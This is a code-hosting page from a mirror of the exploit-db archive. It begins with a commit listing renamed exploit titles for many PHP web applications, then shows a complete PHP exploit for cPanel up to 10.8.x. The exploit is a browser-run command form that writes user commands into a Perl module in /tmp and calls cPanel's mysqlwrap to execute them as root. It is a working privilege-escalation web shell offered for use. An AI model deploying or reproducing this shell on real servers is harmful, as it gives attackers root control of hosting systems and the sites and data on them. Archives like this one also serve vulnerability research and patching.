bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/28660.php
Offensive Security c203af40e6 DB: 2016-12-31 
1 new exploits

Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure
cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure

pppBlog 0.3.8 - (randompic.php) System Disclosure
pppBlog 0.3.8 - System Disclosure

NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit
NetRisk 1.9.7 - Remote Password Change Exploit

netrisk 1.9.7 - Cross-Site Scripting / SQL Injection
NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection

Cpanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)
cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)

MyForum 1.3 - (lecture.php id) SQL Injection
MyForum 1.3 - 'lecture.php' SQL Injection

MyForum 1.3 - (padmin) Local File Inclusion
MyForum 1.3 - 'padmin' Parameter Local File Inclusion
e107 Plugin alternate_profiles - 'id' SQL Injection
MyKtools 2.4 - (langage) Local File Inclusion
e107 Plugin alternate_profiles - 'id' Parameter SQL Injection
MyKtools 2.4 - 'langage' Parameter Local File Inclusion
questcms - Cross-Site Scripting / Directory Traversal / SQL Injection
AIOCP 1.4 - 'poll_id' SQL Injection
QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection
AIOCP 1.4 - 'poll_id' Parameter SQL Injection
PersianBB - 'iranian_music.php id' SQL Injection
Agares ThemeSiteScript 1.0 (loadadminpage) - Remote File Inclusion
PersianBB - 'id' Parameter SQL Injection
Agares ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion

Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution
Sepal SPBOARD 4.5 - 'board.cgi' Remote Command Execution
Venalsur on-line Booking Centre - (OfertaID) Cross-Site Scripting / SQL Injection
Pro Traffic One - 'poll_results.php id' SQL Injection
Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection
Pro Traffic One - 'poll_results.php' SQL Injection

e107 Plugin lyrics_menu - 'lyrics_song.php l_id' SQL Injection
e107 Plugin lyrics_menu - 'l_id' Parameter SQL Injection
SFS EZ Adult Directory - 'Directory.php id' SQL Injection
Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection
cpanel 11.x - Cross-Site Scripting / Local File Inclusion
SFS EZ Adult Directory - 'directory.php' SQL Injection
Logz podcast CMS 1.3.1 - 'art' Parameter SQL Injection
cPanel 11.x - Cross-Site Scripting / Local File Inclusion

SFS EZ HotScripts-like Site - 'cid' SQL Injection
SFS EZ HotScripts-like Site - 'cid' Parameter SQL Injection

SFS EZ Hosting Directory - 'cat_id' SQL Injection
SFS EZ Hosting Directory - 'cat_id' Parameter SQL Injection
SFS EZ Home Business Directory - 'cat_id' SQL Injection
SFS EZ Link Directory - 'cat_id' SQL Injection
Adult Banner Exchange Website - (targetid) SQL Injection
SFS EZ BIZ PRO - 'track.php id' SQL Injection
SFS EZ Affiliate - 'cat_id' SQL Injection
Article Publisher PRO 1.5 - (Authentication Bypass) SQL Injection
SFS EZ Webring - (cat) SQL Injection
SFS EZ Hot or Not - (phid) SQL Injection
SFS EZ Software - 'id' SQL Injection
SFS EZ Home Business Directory - 'cat_id' Parameter SQL Injection
SFS EZ Link Directory - 'cat_id' Parameter SQL Injection
Adult Banner Exchange Website - 'targetid' Parameter SQL Injection
SFS EZ BIZ PRO - SQL Injection
SFS EZ Affiliate - 'cat_id' Parameter SQL Injection
Article Publisher PRO 1.5 - Authentication Bypass
SFS EZ Webring - 'cat' Parameter SQL Injection
SFS EZ Hot or Not - 'phid' Parameter SQL Injection
SFS EZ Software - 'id' Parameter SQL Injection
Article Publisher PRO - (userid) SQL Injection
SFS EZ Auction - 'viewfaqs.php cat' Blind SQL Injection
SFS EZ Career - 'content.php topic' SQL Injection
SFS EZ Top Sites - 'topsite.php ts' SQL Injection
SFS EZ Webstore - (where) SQL Injection
SFS EZ Pub Site - 'Directory.php cat' SQL Injection
SFS EZ Gaming Cheats - 'id' SQL Injection
Article Publisher PRO - 'userid' Parameter SQL Injection
SFS EZ Auction - Blind SQL Injection
SFS EZ Career - SQL Injection
SFS EZ Top Sites - SQL Injection
SFS EZ Webstore - 'where' Parameter SQL Injection
SFS EZ Pub Site - SQL Injection
SFS EZ Gaming Cheats - SQL Injection
GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection
YourFreeWorld Programs Rating - 'details.php id' SQL Injection
GO4I.NET ASP Forum 1.0 - SQL Injection
YourFreeWorld Programs Rating - SQL Injection
Shahrood - 'ndetail.php id' Blind SQL Injection
YourFreeWorld Downline Builder - 'id' SQL Injection
YourFreeWorld Banner Management - 'id' SQL Injection
YourFreeWorld Blog Blaster - 'id' SQL Injection
YourFreeWorld Autoresponder Hosting - 'id' SQL Injection
YourFreeWorld Forced Matrix Script - 'id' SQL Injection
YourFreeWorld Short Url & Url Tracker - 'id' SQL Injection
YourFreeWorld Viral Marketing - 'id' SQL Injection
YourFreeWorld Scrolling Text Ads - 'id' SQL Injection
YourFreeWorld Reminder Service - 'id' SQL Injection
YourFreeWorld Classifieds Blaster - 'id' SQL Injection
Shahrood - Blind SQL Injection
YourFreeWorld Downline Builder - 'tr.php' SQL Injection
YourFreeWorld Banner Management - SQL Injection
YourFreeWorld Blog Blaster - 'tr.php' SQL Injection
YourFreeWorld Autoresponder Hosting - 'tr.php' SQL Injection
YourFreeWorld Forced Matrix Script - SQL Injection
YourFreeWorld Short Url & Url Tracker - SQL Injection
YourFreeWorld Viral Marketing - SQL Injection
YourFreeWorld Scrolling Text Ads - SQL Injection
YourFreeWorld Reminder Service - SQL Injection
YourFreeWorld Classifieds Blaster - SQL Injection
Downline Goldmine Builder - 'tr.php id' SQL Injection
Downline Goldmine Category Addon - 'id' SQL Injection
YourFreeWorld Classifieds Hosting - 'id' SQL Injection
YourFreeWorld URL Rotator - 'id' SQL Injection
Downline Goldmine paidversion - 'tr.php id' SQL Injection
Downline Goldmine newdownlinebuilder - 'tr.php id' SQL Injection
YourFreeWorld Shopping Cart - 'index.php c' Blind SQL Injection
Maran PHP Shop - 'prod.php cat' SQL Injection
Downline Goldmine Builder - SQL Injection
Downline Goldmine Category Addon - SQL Injection
YourFreeWorld Classifieds Hosting - SQL Injection
YourFreeWorld URL Rotator - SQL Injection
Downline Goldmine paidversion - SQL Injection
Downline Goldmine newdownlinebuilder - SQL Injection
YourFreeWorld Shopping Cart - Blind SQL Injection
Maran PHP Shop - 'prod.php' SQL Injection

1st News - 'products.php id' SQL Injection
1st News - SQL Injection

BosClassifieds - 'cat_id' SQL Injection
BosClassifieds - 'cat_id' Parameter SQL Injection

MatPo Link 1.2b - (view.php id) SQL Injection
MatPo Link 1.2b - SQL Injection

Apoll 0.7b - (Authentication Bypass) SQL Injection
Apoll 0.7b - Authentication Bypass
pppBlog 0.3.11 - (randompic.php) File Disclosure
TBmnetCMS 1.0 - (index.php content) Local File Inclusion
pppBlog 0.3.11 - File Disclosure
TBmnetCMS 1.0 - Local File Inclusion

WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection
WEBBDOMAIN Post Card 1.02 - 'catid' Parameter SQL Injection

nicLOR Puglia Landscape - 'id' Local File Inclusion
nicLOR Puglia Landscape - Local File Inclusion

Vibro-School-CMS - (nID) SQL Injection
Vibro-School-CMS - 'nID' Parameter SQL Injection
WEBBDOMAIN Petition 1.02/2.0/3.0 - (Authentication Bypass) SQL Injection
WEBBDOMAIN Polls 1.01 - (Authentication Bypass) SQL Injection
WEBBDOMAIN Quiz 1.02 - (Authentication Bypass) SQL Injection
WEBBDOMAIN Webshop 1.02 - (Authentication Bypass) SQL Injection
Simple Document Management System 1.1.4 - SQL Injection Authentication Bypass
Tours Manager 1.0 - (cityview.php cityid) SQL Injection
WEBBDOMAIN Post Card 1.02 - (Authentication Bypass) SQL Injection
WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentication Bypass
WEBBDOMAIN Polls 1.01 - Authentication Bypass
WEBBDOMAIN Quiz 1.02 - Authentication Bypass
WEBBDOMAIN Webshop 1.02 - Authentication Bypass
Simple Document Management System 1.1.4 - Authentication Bypass
Tours Manager 1.0 - SQL Injection
WEBBDOMAIN Post Card 1.02 - Authentication Bypass
PHPX 3.5.16 - (news_id) SQL Injection
Pre Podcast Portal - 'Tour.php id' SQL Injection
PHPX 3.5.16 - 'news_id' Parameter SQL Injection
Pre Podcast Portal - SQL Injection

Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities
Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling

Absolute Form Processor XE-V 1.5 - (Authentication Bypass) SQL Injection
Absolute Form Processor XE-V 1.5 - Authentication Bypass

MyForum 1.3 - (Authentication Bypass) SQL Injection
MyForum 1.3 - Authentication Bypass

Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)
cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account)

Simple Document Management System (SDMS) - SQL Injection
Simple Document Management System - SQL Injection

Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)
cPanel 11.x - Cross-Site Request Forgery (Edit E-mail)

PHPMyForum 4.0 - 'index.php' page Parameter Cross-Site Scripting
PHPMyForum 4.0 - 'page' Parameter Cross-Site Scripting

Cpanel 10 - Select.HTML Cross-Site Scripting
cPanel 10 - Select.HTML Cross-Site Scripting

CPanel 5-10 - SUID Wrapper Privilege Escalation
cPanel 5-10 - SUID Wrapper Privilege Escalation
AIOCP 1.3.x - 'cp_forum_view.php' Multiple Parameter Cross-Site Scripting
AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter Cross-Site Scripting
AIOCP 1.3.x - 'cp_show_ec_products.php' order_field Parameter Cross-Site Scripting
AIOCP 1.3.x - 'cp_users_online.php order_field Parameter Cross-Site Scripting
AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter Cross-Site Scripting
AIOCP 1.3.x - '/admin/code/index.php' load_page Parameter Remote File Inclusion
AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter SQL Injection
AIOCP 1.3.x - 'cp_news.php' Multiple Parameter SQL Injection
AIOCP 1.3.x - 'cp_forum_view.php' choosed_language Parameter SQL Injection
AIOCP 1.3.x - 'cp_edit_user.php' choosed_language Parameter SQL Injection
AIOCP 1.3.x - 'cp_newsletter.php' Multiple Parameter SQL Injection
AIOCP 1.3.x - 'cp_links.php' Multiple Parameter SQL Injection
AIOCP 1.3.x - 'cp_contact_us.php' choosed_language Parameter SQL Injection
AIOCP 1.3.x - 'cp_show_ec_products.php' Multiple Parameter SQL Injection
AIOCP 1.3.x - 'cp_login.php' choosed_language Parameter SQL Injection
AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection
AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection
AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection
AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting
AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting
AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting
AIOCP 1.3.x - 'cp_users_online.php' Cross-Site Scripting
AIOCP 1.3.x - 'cp_links_search.php' Cross-Site Scripting
AIOCP 1.3.x - 'load_page' Parameter Remote File Inclusion
AIOCP 1.3.x - 'cp_dpage.php' SQL Injection
AIOCP 1.3.x - 'cp_news.php' SQL Injection
AIOCP 1.3.x - 'cp_forum_view.php' SQL Injection
AIOCP 1.3.x - 'cp_edit_user.php' SQL Injection
AIOCP 1.3.x - 'cp_newsletter.php' SQL Injection
AIOCP 1.3.x - 'cp_links.php' SQL Injection
AIOCP 1.3.x - 'cp_contact_us.php' SQL Injection
AIOCP 1.3.x - 'cp_show_ec_products.php' SQL Injection
AIOCP 1.3.x - 'cp_login.php' SQL Injection
AIOCP 1.3.x - 'cp_users_online.php' SQL Injection
AIOCP 1.3.x - 'cp_codice_fiscale.php' SQL Injection
AIOCP 1.3.x - 'cp_links_search.php' SQL Injection

CPanel 10 - DNSlook.HTML Cross-Site Scripting
cPanel 10 - DNSlook.HTML Cross-Site Scripting

CPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities
cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities

CPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting
cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting

CPanel 11 - PassWDMySQL Cross-Site Scripting
cPanel 11 - PassWDMySQL Cross-Site Scripting

CPanel 10.9.1 - Resname Parameter Cross-Site Scripting
cPanel 10.9.1 - Resname Parameter Cross-Site Scripting

netRisk 1.9.7 - 'index.php' Remote File Inclusion
NetRisk 1.9.7 - 'index.php' Remote File Inclusion

YourFreeWorld Downline Builder Pro - 'id' Parameter SQL Injection
YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection

XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection
Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection

TBmnetCMS 1.0 - 'content' Parameter Cross-Site Scripting
TBmnetCMS 1.0 - Cross-Site Scripting

pppBLOG 0.3 - 'search.php' Cross-Site Scripting

Zend Framework / zend-mail < 2.4.11 - Remote Code Execution
2016-12-31 05:01:17 +00:00

56 lines
2.1 KiB
PHP
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/20163/info
cPanel is prone to a remote privilege-escalation vulnerability.
A remote attacker can exploit this issue to gain administrative access to the affected application. This may lead to other attacks.
<!- for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have
<!- bash shell access on victim server but with this new exploit you only need
<!- to upload php file and run this into browser on victim servers.
<!- then you have root Access and you can do anything ....
<!- Coded by nima salehi ( nima@ashiyane.ir )
<!- Ashiyane Security Corporation www.Ashiyane.ir >
<title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
<center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
<?
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "<br><br><br><br><br><b>Sorry Safe-mode Is On ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
$disablef = str_replace(" ","",$disablef);
$disablef = explode(",",$disablef);
if (in_array("passthru",$disablef))
{
echo "<br><br><br><br><br><b>Sorry Passthru Is Disable ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
}
?>
<form method="POST" action="<?php echo $surl; ?>">
Command : <input type="text" name="c" size="40">
<input type="submit" value=" Run " name="B1"></form>
<textarea cols="60" rows="20" readonly>
<?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?>
</textarea>
<br>
Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
</center>
Reference in a new issue View git blame Copy permalink